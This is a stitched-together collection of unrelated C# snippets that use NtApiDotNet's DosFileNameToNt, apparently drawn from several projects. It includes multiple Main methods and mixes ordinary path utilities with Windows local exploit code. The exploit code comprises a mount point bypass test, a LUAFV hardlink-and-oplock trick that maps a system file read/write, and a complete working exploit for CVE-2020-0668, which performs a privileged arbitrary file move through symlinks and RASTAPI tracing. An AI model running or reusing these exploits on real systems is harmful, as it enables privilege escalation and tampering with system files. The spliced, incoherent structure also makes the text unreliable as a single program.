static void Main(string[] args)
{
try
{
string dir = CreateDir();
Console.WriteLine("Created {0} to test mount point bypass", dir);
using (var token = NtToken.OpenProcessToken())
{
Console.WriteLine("Lowering token to Low IL");
token.SetIntegrityLevel(TokenIntegrityLevel.Low);
}
using (var file = NtFile.Open(NtFileUtils.DosFileNameToNt(dir), null,
FileAccessRights.GenericRead | FileAccessRights.GenericWrite,
FileShareMode.None, FileOpenOptions.OpenReparsePoint | FileOpenOptions.DirectoryFile))
{
Console.WriteLine("Opened {0}", file.FullPath);
byte[] buffer = BuildReparseBuffer(Environment.GetFolderPath(Environment.SpecialFolder.Windows));
file.FsControl(NtWellKnownIoControlCodes.FSCTL_SET_REPARSE_POINT_EX, buffer, 0);
MountPointReparseBuffer rp = (MountPointReparseBuffer)file.GetReparsePoint();
Console.WriteLine("Set Mount Point: {0} {1}", rp.Tag, rp.SubstitutionName);
Console.ReadLine();
}
}
catch (Exception ex)
{
Console.WriteLine(ex);
Console.ReadLine();
}
}
private string MapWin32ToDevicePath()
{
string path = NtFileUtils.DosFileNameToNt(SymbolicLinkPath);
string final_component = string.Empty;
// Strip off any remaining path.
if (path.StartsWith(@"\??\"))
{
int slash_index = path.IndexOf('\\', 4);
if (slash_index >= 0)
{
final_component = path.Substring(slash_index);
path = path.Substring(0, slash_index);
}
}
using (var link = NtSymbolicLink.Open(path, null, SymbolicLinkAccessRights.Query, false))
{
if (link.IsSuccess)
{
path = link.Result.Target;
}
}
return(path + final_component);
}
static string ConvertPath(string path)
{
if (path.StartsWith(@"@\"))
{
return(path.Substring(1));
}
return(NtFileUtils.DosFileNameToNt(path));
}
static void UpdateSecurity(string path)
{
var sd = new NtApiDotNet.SecurityDescriptor("D:AI(A;;FA;;;WD)(A;;FA;;;AC)");
using (var file = NtFile.Open(NtFileUtils.DosFileNameToNt(path), null, FileAccessRights.WriteDac))
{
file.SetSecurityDescriptor(sd, NtApiDotNet.SecurityInformation.Dacl);
}
}
internal static NtResult <string> GetFileBasePath(SessionState state)
{
var current_path = state.Path.CurrentLocation;
if (!current_path.Provider.Name.Equals("FileSystem", StringComparison.OrdinalIgnoreCase))
{
return(NtResult <string> .CreateResultFromError(NtStatus.STATUS_OBJECT_PATH_NOT_FOUND, false));
}
return(NtFileUtils.DosFileNameToNt(current_path.Path, false));
}
/// <summary>
/// Get certificates from a PE file.
/// </summary>
/// <param name="path">The path to the PE file.</param>
/// <param name="throw_on_error">True the throw on error.</param>
/// <returns>The list of authenticode certificate entries.</returns>
public static NtResult <IReadOnlyList <AuthenticodeCertificate> > GetCertificates(string path, bool throw_on_error)
{
using (var file = NtFile.Open(NtFileUtils.DosFileNameToNt(path), null, FileAccessRights.ReadData | FileAccessRights.Synchronize,
FileShareMode.Read | FileShareMode.Delete, FileOpenOptions.NonDirectoryFile | FileOpenOptions.SynchronousIoNonAlert, throw_on_error)) {
if (!file.IsSuccess)
{
return(file.Cast <IReadOnlyList <AuthenticodeCertificate> >());
}
return(GetCertificates(file.Result, throw_on_error));
}
}
/// <summary>
/// Virtual method to return the value of the Path variable.
/// </summary>
/// <returns>The object path.</returns>
protected override string ResolvePath()
{
if (Win32Path)
{
return(NtFileUtils.DosFileNameToNt(Path));
}
else
{
return(Path);
}
}
static NtSection CreateSection(string file_path, string name, NtDirectory root)
{
using (var file = NtFile.Open(NtFileUtils.DosFileNameToNt(file_path), null,
FileAccessRights.GenericRead | FileAccessRights.GenericExecute,
FileShareMode.Read | FileShareMode.Delete, FileOpenOptions.NonDirectoryFile))
{
using (var obja = CreateObjectAttributes(name, root))
{
return(NtSection.Create(obja, SectionAccessRights.MaximumAllowed,
null, MemoryAllocationProtect.ExecuteRead, SectionAttributes.Image, file));
}
}
}
static NtSection RemapFileAsRW()
{
string base_path = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData), "luafv_" + Guid.NewGuid());
Console.WriteLine("Base Path: {0}", base_path);
DirectorySecurity dir_sd = new DirectorySecurity();
Directory.CreateDirectory(base_path);
string target_path = NtFileUtils.DosFileNameToNt(Path.Combine(base_path, "dummy.txt"));
string license_file = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.System), "license.rtf");
Console.WriteLine("Trying to map {0} R/W", license_file);
NtFile.CreateHardlink(NtFileUtils.DosFileNameToNt(license_file), target_path);
using (var oplock_file = NtFile.Open(target_path, null, FileAccessRights.ReadAttributes, FileShareMode.All, FileOpenOptions.NonDirectoryFile))
{
var oplock = oplock_file.RequestOplockAsync(OplockLevelCache.Read | OplockLevelCache.Write, RequestOplockInputFlag.Request);
Console.WriteLine("Started oplock");
SetVirtualization(true);
Console.WriteLine("Opening file");
using (var file = NtFile.Open(target_path, null, FileAccessRights.GenericRead
| FileAccessRights.GenericWrite, FileShareMode.All,
FileOpenOptions.NonDirectoryFile | FileOpenOptions.CompleteIfOplocked))
{
SetVirtualization(false);
Console.WriteLine("{0} {1}", NtProcess.Current.ProcessId, file.Handle.DangerousGetHandle());
Console.WriteLine("{0} {1}", file.FullPath, file.GrantedAccess);
CreateVirtualStoreFile(target_path, GetDummyBuffer());
var async_read = file.ReadAsync(1, 0);
if (!oplock.Wait(10000))
{
throw new Exception("Oplock Timed Out");
}
Console.WriteLine("Oplock Fired");
EaBuffer ea = new EaBuffer();
ea.AddEntry("Hello", new byte[16], EaBufferEntryFlags.None);
// Set EA to force the delayed virtualization to complete without triggering oplock.
Console.WriteLine("Setting EA");
file.SetEa(ea);
Console.WriteLine("File now {0}", file.FullPath);
oplock_file.Close();
Console.WriteLine("Closed oplock_file");
if (!async_read.Wait(10000))
{
throw new Exception("Async Read Timed Out");
}
Console.WriteLine("Read Complete");
return NtSection.Create(null, SectionAccessRights.MaximumAllowed, null,
MemoryAllocationProtect.ReadWrite, SectionAttributes.Commit, file);
}
}
}
static string CreateDir()
{
string temp_path = Path.Combine(Path.GetTempPath(), Guid.NewGuid().ToString());
Directory.CreateDirectory(temp_path);
using (var file = NtFile.Open(NtFileUtils.DosFileNameToNt(temp_path), null, FileAccessRights.WriteOwner))
{
var sd = new SecurityDescriptor
{
IntegrityLevel = TokenIntegrityLevel.Low
};
file.SetSecurityDescriptor(sd, SecurityInformation.Label);
return(temp_path);
}
}
static byte[] BuildReparseBuffer(string target)
{
MountPointReparseBuffer buffer = new MountPointReparseBuffer(NtFileUtils.DosFileNameToNt(target), target);
MemoryStream stm = new MemoryStream();
BinaryWriter writer = new BinaryWriter(stm);
// Flags.
writer.Write(0);
// Existing tag.
writer.Write(0);
writer.Write(Guid.Empty.ToByteArray());
// Reserved.
writer.Write(0UL);
writer.Write(buffer.ToByteArray());
return(stm.ToArray());
}
private static string RemoveDevicePrefix(string win32_path)
{
if (win32_path.StartsWith(@"\\?\"))
{
if (win32_path.StartsWith(@"\\?\UNC\", StringComparison.OrdinalIgnoreCase))
{
return(@"\\" + win32_path.Substring(8));
}
else if (win32_path.Length >= 6)
{
if (NtFileUtils.GetDosPathType(win32_path.Substring(4)) == RtlPathType.DriveAbsolute)
{
return(win32_path.Substring(4));
}
}
}
return(win32_path);
}
internal static string ResolveWin32Path(SessionState state, string path, bool convert_to_nt_path)
{
var path_type = NtFileUtils.GetDosPathType(path);
if (path_type == RtlPathType.Rooted && path.StartsWith(@"\??"))
{
path_type = RtlPathType.LocalDevice;
}
switch (path_type)
{
case RtlPathType.Relative:
case RtlPathType.DriveRelative:
case RtlPathType.Rooted:
path = ResolveRelativePath(state, path, path_type);
break;
}
return(convert_to_nt_path ? NtFileUtils.DosFileNameToNt(path) : Path.GetFullPath(path));
}
/// <summary>
/// Virtual method to resolve the value of the Path variable.
/// </summary>
/// <returns>The object path.</returns>
protected override string ResolvePath()
{
if (Win32Path)
{
string path = Path;
var path_type = NtFileUtils.GetDosPathType(Path);
switch (path_type)
{
case RtlPathType.Relative:
case RtlPathType.DriveRelative:
case RtlPathType.Rooted:
path = ResolveRelativePath(path, path_type);
break;
}
return(NtFileUtils.DosFileNameToNt(path));
}
else
{
return(Path);
}
}
/// <summary>
/// Convert a Win32 Path to a Native NT path.
/// </summary>
/// <param name="win32_path">The win32 path to convert.</param>
/// <returns>The native path.</returns>
protected override string ConvertWin32Path(string win32_path)
{
return(NtFileUtils.DosFileNameToNt(win32_path));
}
static void Main(string[] args)
{
Application.EnableVisualStyles();
Application.SetCompatibleTextRenderingDefault(false);
NtToken.EnableDebugPrivilege();
try
{
if (args.Length == 0)
{
Application.Run(new MainForm());
}
else
{
int handle = -1;
string text = String.Empty;
bool read_only = false;
bool delete_file = false;
string filename = string.Empty;
OptionSet opts = new OptionSet()
{
{ "handle=", "Specify an inherited handle to view.",
v => handle = int.Parse(v) },
{ "readonly", "Specify view section readonly", v => read_only = v != null },
{ "file=", "Specify a file to view", v => filename = v },
{ "delete", "Delete file after viewing", v => delete_file = v != null },
};
opts.Parse(args);
if (handle > 0)
{
using (var section = NtSection.FromHandle(new SafeKernelObjectHandle(new IntPtr(handle), true)))
{
read_only = read_only || !section.IsAccessGranted(SectionAccessRights.MapWrite);
using (var map = read_only ? section.MapRead() : section.MapReadWrite())
{
using (SectionEditorForm frm = new SectionEditorForm(map, GetName(section, map), read_only))
{
Application.Run(frm);
}
}
}
}
else if (File.Exists(filename))
{
try
{
using (var file = NtFile.Open(NtFileUtils.DosFileNameToNt(filename), null,
FileAccessRights.ReadData, FileShareMode.Read | FileShareMode.Delete, FileOpenOptions.NonDirectoryFile))
{
using (NtSection section = NtSection.CreateReadOnlyDataSection(file))
{
using (var map = section.MapRead())
{
using (SectionEditorForm frm = new SectionEditorForm(map, filename, true, file.Length))
{
Application.Run(frm);
}
}
}
}
}
finally
{
if (delete_file)
{
File.Delete(filename);
}
}
}
else
{
throw new Exception("Invalid command line arguments");
}
}
}
catch (Exception ex)
{
MessageBox.Show(ex.Message, "Error", MessageBoxButtons.OK, MessageBoxIcon.Error);
}
}
static public void MakeMountPoint(string mountpoint)
{
string mountDirectoryNt = NtFileUtils.DosFileNameToNt(mountpoint);
NtFile.CreateMountPoint(mountDirectoryNt, ObjectDirectory, "");
}
static void Main(string[] args)
{
AppDomain.CurrentDomain.ProcessExit += AppDomain_ProcessExit;
using (var textWriter = new StreamWriter(@"D:\test.txt"))
{
foreach (var arg in args)
{
textWriter.WriteLine(arg);
}
}
try
{
if (args[0] == "-p")
{
_process = NtProcess.Open(int.Parse(args[1]), ProcessAccessRights.MaximumAllowed);
_waitHandle = new IntPtr(long.Parse(args[3]));
}
else
{
var config = new NtProcessCreateConfig();
config.InitFlags |= ProcessCreateInitFlag.IFEOSkipDebugger;
config.ThreadFlags |= ThreadCreateFlags.Suspended;
var path = NtFileUtils.DosFileNameToNt(args[0]);
config.ConfigImagePath = path;
var result = NtProcess.Create(config);
_process = result.Process;
_thread = result.Thread;
}
while (true)
{
bool beingDebugged;
if (_process.Wow64)
{
PartialPeb32 peb = (PartialPeb32)_process.GetPeb();
beingDebugged = peb.BeingDebugged == 1;
}
else
{
PartialPeb peb = (PartialPeb)_process.GetPeb();
beingDebugged = peb.BeingDebugged == 1;
}
if (beingDebugged)
{
break;
}
Thread.Sleep(100);
}
if (_thread != null)
{
_thread.Resume();
}
if (_waitHandle != IntPtr.Zero)
{
SetEvent(_waitHandle);
}
}
finally
{
cleanUp(false);
}
}
internal void RunAccessCheckPathInternal(IEnumerable <TokenEntry> tokens, string path)
{
RunAccessCheckPath(tokens, NtFileUtils.DosFileNameToNt(path));
}
static void Main(string[] args)
{
if (args.Length != 2)
{
Console.WriteLine("Use CVE-2020-0668 to perform an arbitrary privileged file move operation.");
Console.WriteLine($"Usage: inFilePath outFilePath");
return;
}
String inDLLPath = args[0];
String outDllPath = args[1];
if (!File.Exists(inDLLPath))
{
Console.WriteLine($@"[!] Cannot find {inDLLPath}!");
return;
}
Console.WriteLine(String.Format("[+] Moving {0} to {1}", inDLLPath, outDllPath));
bool checkVuln = isVulnerable();
if (!checkVuln)
{
Console.WriteLine("[-] NOT VULNERABLE: Hotfix KB4532693 Found");
return;
}
else
{
Console.WriteLine("[+] VULNERABLE: Hotfix KB4532693 Not Found");
}
String tempDirectory = GetTemporaryDirectory();
const string ObjectDirectory = @"\RPC Control";
Console.WriteLine($@"[+] Mounting {ObjectDirectory} onto {tempDirectory}");
string tempDirectoryNt = NtFileUtils.DosFileNameToNt(tempDirectory);
NtFile.CreateMountPoint(tempDirectoryNt, ObjectDirectory, "");
Console.WriteLine("[+] Creating symbol links");
var logFileSymlnk = NtSymbolicLink.Create($@"{ObjectDirectory}\RASTAPI.LOG", $@"\??\{inDLLPath}");
var oldFileSymlnk = NtSymbolicLink.Create($@"{ObjectDirectory}\RASTAPI.OLD", $@"\??\{outDllPath}");
Console.WriteLine(@"[+] Updating the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RASPLAP configuration.");
Console.WriteLine(@"[+] Sleeping for 5 seconds so the changes take effect");
UpdateRASTAPITracingConfig(tempDirectory, true, 0x1000);
Thread.Sleep(5000); // might have to sleep for the update to take effect
string phonebookPath = Path.Combine(Path.GetTempPath(), Guid.NewGuid().ToString() + ".pbk");
Console.WriteLine($"[+] Writing phonebook file to {phonebookPath}");
File.WriteAllText(phonebookPath, CVE_2020_0668.Properties.Resources.Phonebook);
using (Process p = new Process())
{
p.StartInfo.FileName = "rasdial";
p.StartInfo.Arguments = $@"VPNTEST test test /PHONEBOOK:{phonebookPath}";
p.StartInfo.CreateNoWindow = true;
p.StartInfo.UseShellExecute = false;
p.Start();
p.WaitForExit();
}
Console.WriteLine("[+] Cleaning up");
File.Delete(phonebookPath);
Directory.Delete(tempDirectory, true);
logFileSymlnk.Close();
oldFileSymlnk.Close();
UpdateRASTAPITracingConfig(@"%windir%\tracing", false, 0x100000); //those are the default values
Console.WriteLine("[+] Done!");
}
